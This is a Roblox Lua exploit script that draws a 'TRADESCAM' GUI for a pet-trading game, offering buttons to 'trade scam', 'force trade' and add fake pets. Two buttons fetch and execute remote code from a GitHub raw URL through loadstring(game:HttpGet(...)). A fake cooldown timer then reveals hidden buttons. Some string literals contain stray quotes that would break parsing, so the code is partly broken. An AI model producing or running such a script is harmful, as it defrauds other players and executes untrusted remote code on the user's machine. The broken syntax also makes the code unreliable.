local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local line = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local UICorner = Instance.new("UICorner")
local TextLabel_2 = Instance.new("TextLabel")
local timer = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local tradescam = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local petnamebox = Instance.new("TextBox")
local addfakepet = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local newdupe = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local petenchant = Instance.new("TextBox")
local petenchant_2 = Instance.new("TextBox")
local petnamebox_2 = Instance.new("TextBox")
local olddupe = Instance.new("TextLabel")

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(36, 170, 41)
Frame.Position = UDim2.new(0.229676396, 0, 0.242350057, 0)
Frame.Size = UDim2.new(0, 296, 0, 369)
Frame.Active = true
Frame.Draggable = true

line.Name = "line"
line.Parent = Frame
line.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
line.BorderSizePixel = 0
line.Position = UDim2.new(0, 0, 0.138211384, 0)
line.Size = UDim2.new(0, 296, 0, 4)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderSizePixel = 0
TextLabel.Size = UDim2.new(0, 296, 0, 29)
TextLabel.Font = Enum.Font.FredokaOne
TextLabel.Text = "TRADESCAM JAN UPDT- INF HUB"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

UICorner.CornerRadius = UDim.new(0, 16)
UICorner.Parent = Frame

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(0.32432431, 0, 0.149051487, 0)
TextLabel_2.Size = UDim2.new(0, 101, 0, 25)
TextLabel_2.Font = Enum.Font.FredokaOne
TextLabel_2.Text = "Trade"
TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

timer.Name = "timer"
timer.Parent = Frame
timer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
timer.BackgroundTransparency = 1.000
timer.BorderSizePixel = 0
timer.Position = UDim2.new(0.0675675645, 0, 0.235772356, 0)
timer.Size = UDim2.new(0, 251, 0, 40)
timer.Font = Enum.Font.GothamBold
timer.Text = "Waiting for trade cooldown... (30s)"
timer.TextColor3 = Color3.fromRGB(0, 0, 0)
timer.TextScaled = true
timer.TextSize = 14.000
timer.TextWrapped = true

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(0.131756753, 0, 0.365853667, 0)
TextLabel_3.Size = UDim2.new(0, 232, 0, 25)
TextLabel_3.Font = Enum.Font.FredokaOne
TextLabel_3.Text = "TRADE-SCAM" (UPDATED)"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

tradescam.Name = "tradescam"
tradescam.Parent = Frame
tradescam.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
tradescam.Position = UDim2.new(0.0337837823, 0, 0.45799458, 0)
tradescam.Size = UDim2.new(0, 278, 0, 29)
tradescam.Font = Enum.Font.GothamBold
tradescam.Text = "TRADE SCAM" (INSTANT REMOVE PETS)"
tradescam.TextColor3 = Color3.fromRGB(0, 0, 0)
tradescam.TextScaled = true
tradescam.TextSize = 14.000
tradescam.TextWrapped = true
tradescam.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/xhenon1/PetsimxAuto/main/Tradescam '))()
end)


UICorner_2.Parent = tradescam

petnamebox.Name = "petnamebox"
petnamebox.Parent = Frame
petnamebox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
petnamebox.Position = UDim2.new(0.192567572, 0, 0.552845538, 0)
petnamebox.Size = UDim2.new(0, 102, 0, 26)
petnamebox.Font = Enum.Font.GothamBlack
petnamebox.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
petnamebox.PlaceholderText = "Fake Pet Name"
petnamebox.Text = ""
petnamebox.TextColor3 = Color3.fromRGB(0, 0, 0)
petnamebox.TextScaled = true
petnamebox.TextSize = 14.000
petnamebox.TextWrapped = true

addfakepet.Name = "addfakepet"
addfakepet.Parent = Frame
addfakepet.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
addfakepet.Position = UDim2.new(0.560810804, 0, 0.547425449, 0)
addfakepet.Size = UDim2.new(0, 122, 0, 29)
addfakepet.Font = Enum.Font.GothamBold
addfakepet.Text = "ADD FAKE PET"
addfakepet.TextColor3 = Color3.fromRGB(0, 0, 0)
addfakepet.TextScaled = true
addfakepet.TextSize = 14.000
addfakepet.TextWrapped = true

UICorner_3.Parent = addfakepet

newdupe.Name = "newdupe"
newdupe.Parent = Frame
newdupe.BackgroundColor3 = Color3.fromRGB(16, 126, 18)
newdupe.Position = UDim2.new(0.030405404, 0, 0.216802165, 0)
newdupe.Size = UDim2.new(0, 278, 0, 25)
newdupe.Visible = false
newdupe.Font = Enum.Font.GothamBold
newdupe.Text = "ForceTrade (v3.1)"
newdupe.TextColor3 = Color3.fromRGB(0, 0, 0)
newdupe.TextScaled = true
newdupe.TextSize = 14.000
newdupe.TextWrapped = true
newdupe.MouseButton1Down:connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/xhenon1/PetsimxAuto/main/Tradescam '))()
end)

UICorner_4.Parent = newdupe

petenchant.Name = "petenchant"
petenchant.Parent = Frame
petenchant.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
petenchant.Position = UDim2.new(0.0337837823, 0, 0.642276406, 0)
petenchant.Size = UDim2.new(0, 149, 0, 26)
petenchant.Font = Enum.Font.GothamBlack
petenchant.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
petenchant.PlaceholderText = "Pet Enchant Name (eg. Strength)"
petenchant.Text = ""
petenchant.TextColor3 = Color3.fromRGB(0, 0, 0)
petenchant.TextScaled = true
petenchant.TextSize = 14.000
petenchant.TextWrapped = true

petenchant_2.Name = "petenchant"
petenchant_2.Parent = Frame
petenchant_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
petenchant_2.Position = UDim2.new(0.560810804, 0, 0.642276406, 0)
petenchant_2.Size = UDim2.new(0, 43, 0, 26)
petenchant_2.Font = Enum.Font.GothamBlack
petenchant_2.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
petenchant_2.PlaceholderText = "V"
petenchant_2.Text = ""
petenchant_2.TextColor3 = Color3.fromRGB(0, 0, 0)
petenchant_2.TextScaled = true
petenchant_2.TextSize = 14.000
petenchant_2.TextWrapped = true

petnamebox_2.Name = "petnamebox"
petnamebox_2.Parent = Frame
petnamebox_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
petnamebox_2.Position = UDim2.new(0.0337837823, 0, 0.555555582, 0)
petnamebox_2.Size = UDim2.new(0, 41, 0, 26)
petnamebox_2.Font = Enum.Font.GothamBlack
petnamebox_2.PlaceholderColor3 = Color3.fromRGB(126, 126, 126)
petnamebox_2.PlaceholderText = "Tier (eg. Rainbow)"
petnamebox_2.Text = ""
petnamebox_2.TextColor3 = Color3.fromRGB(0, 0, 0)
petnamebox_2.TextScaled = true
petnamebox_2.TextSize = 14.000
petnamebox_2.TextWrapped = true

olddupe.Name = "olddupe"
olddupe.Parent = Frame
olddupe.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
olddupe.BackgroundTransparency = 1.000
olddupe.BorderSizePixel = 0
olddupe.Position = UDim2.new(0.0675675645, 0, 0.273712724, 0)
olddupe.Size = UDim2.new(0, 251, 0, 26)
olddupe.Visible = false
olddupe.Font = Enum.Font.GothamBold
olddupe.Text = "click force trade (v3.1)"
olddupe.TextColor3 = Color3.fromRGB(0, 0, 0)
olddupe.TextScaled = true
olddupe.TextSize = 14.000
olddupe.TextWrapped = true

wait(30)

timer.Visible = true
newdupe.Visible = true
olddupe.Visible = true






